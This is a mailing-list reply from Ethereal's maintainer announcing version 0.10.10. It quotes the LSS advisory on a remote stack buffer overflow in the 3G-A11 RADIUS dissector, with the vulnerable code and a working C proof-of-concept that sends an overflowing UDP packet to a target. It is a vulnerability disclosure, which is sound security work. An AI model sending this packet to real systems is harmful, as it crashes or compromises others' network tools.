Re: Ethereal remote buffer overflow

[Gerald Combs <gerald () ethereal com>]

Ethereal 0.10.10 will be released on Thursday, March 10.  It will fix
this as well as two other security and stability-related issues.  If you
need a fix immediately, you can download source tarballs and Windows
installers from

    http://www.ethereal.com/distribution/buildbot-builds/


LSS Security wrote:
>                       LSS Security Advisory #LSS-2005-03-04
>                              http://security.lss.hr
>
> ---
>
> Title                 :  Ethereal remote buffer overflow
> Advisory ID           :  LSS-2005-03-04
> Date                  :  08.03.2005 
> Advisory URL:         :  http://security.lss.hr/en/index.php?page=exp 
> Impact                        :  Stack overflow and possible code execution
> Risk level            :  High 
> Vulnerability type    :  Remote 
> Vendors contacted     :  Yes
>
> ---
>
>
>
>
> ===[ Overview 
>
> Ethereal is used by network professionals around the world for troubleshooting, 
> analysis, software and protocol development, and education. It has all of the 
> standard features  you would expect in a protocol analyzer, and several 
> features not seen in any other product. Its open source license allows talented 
> experts in the networking community to add enhancements. It runs on all popular 
> computing platforms, including Unix, Linux, and Windows.
>
>
>
> ===[ Vulnerability
>
> There is remote buffer overflow vulnerability in Ethereal dissector for 
> CDMA2000 A11 packets. Vulnerability is located in dissect_a11_radius() function 
> in packet-3g-a11.c used for RADIUS authentication dissection. Number of bytes 
> that will be copied from packet to buffer in stack is taken from packet itself. 
> 16 bytes are reserved for that buffer, and string length can be up to 256 bytes 
> (unsigned char), so is possible to overflow local variables and return address. 
>
>
> packet-3g-a11.c:
> ----------------
> #define MAX_STRVAL 16
> ...
> dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len)
> {
> ...
>   size_t     radius_len;
>   ...
>   guchar     str_val[MAX_STRVAL]; 
>   ...
>   radius_len = tvb_get_guint8(tvb, offset + 1);
>   ...
>   strncpy(str_val, tvb_get_ptr(tvb,offset+2,radius_len-2), radius_len-2); 
> ...
> }
> ----------------
>
> A similar vulnerability was also found in same function few lines below where 
> RADIUS attributes are copied to stack.
>
> packet-3g-a11.c:
> ----------------
> #define MAX_STRVAL 16
> ...
> dissect_a11_radius( tvbuff_t *tvb, int offset, proto_tree *tree, int app_len)
> {
> ...
>   guint      attribute_len;
>   ...
>   guchar     str_val[MAX_STRVAL];
>   ...
>   attribute_len = tvb_get_guint8(tvb, offset + radius_offset + 1);
>   ...
>   case ATTR_TYPE_STR:
>   strncpy(str_val,tvb_get_ptr(tvb,offset+radius_offset+2,attribute_len - 2),
>          attribute_len - 2); 
>
> ...
> }
> ----------------
>
>
>
> ===[ Affected versions
>
> All versions after 3G-A11 dissector was added to CVS including latest 0.10.9.
> Vulnerability was tested with latest Ethereal on Linux and Windows.
>
>
>
> ===[ Fix
>
> It seems that that they have fixed that vulnerability just few days ago, 
> and new version will probably be available soon from http://www.ethereal.com.
>
>
>
> ===[ PoC Exploit
>
> Exploit is in attachment, and URL http://security.lss.hr/en/PoC/ 
>
>
>
> ===[ Credits
>
> Credits for this vulnerability goes to Leon Juranic. 
>
>
>
> ===[ LSS Security Contact
>  
>  LSS Security Team, <eXposed by LSS>
>  
>  WWW    : http://security.lss.hr
>  E-mail : security () LSS hr
>  Tel  : +385 1 6129 775
>   
>
>
>
>
>
> ------------------------------------------------------------------------
>
> /*
>  * 
>  * Ethereal 3G-A11 remote buffer overflow PoC exploit 
>  * --------------------------------------------------
>  * Coded by Leon Juranic <ljuranic () lss hr> 
>  * LSS Security <http://security.lss.hr/en/>
>  * 
>  */ 
>
> #include <stdio.h>
> #include <sys/socket.h>
> #include <sys/types.h>
> #include <sys/stat.h>
> #include <netinet/in.h>
> #include <arpa/inet.h>
> #include <netdb.h>
>
>
> main (int argc, char **argv)
> {
>       int sock;
>       struct sockaddr_in sin;
>       unsigned char buf[1024];
>       char bla[200];
>
>       sock=socket(AF_INET,SOCK_DGRAM,0);
>
>       sin.sin_family=AF_INET;
>       sin.sin_addr.s_addr = inet_addr(argv[1]);
>       sin.sin_port = htons(699);
>
>       buf[0] = 22;
>       memset(buf+1,'A',19);
>       buf[20] = 38;
>       *(unsigned short*)&buf[22] = htons(100); 
>       *(unsigned short*)&buf[28] = 0x0101;
>       buf[30] = 31;
>       buf[31] = 150;   // len for overflow...play with this value if it doesn't work
>
>       memset (bla,'B',200);
>       strncpy (buf+32,bla,180);
>       
>       sendto (sock,buf,200,0,(struct sockaddr*)&sin,sizeof(struct sockaddr));
> }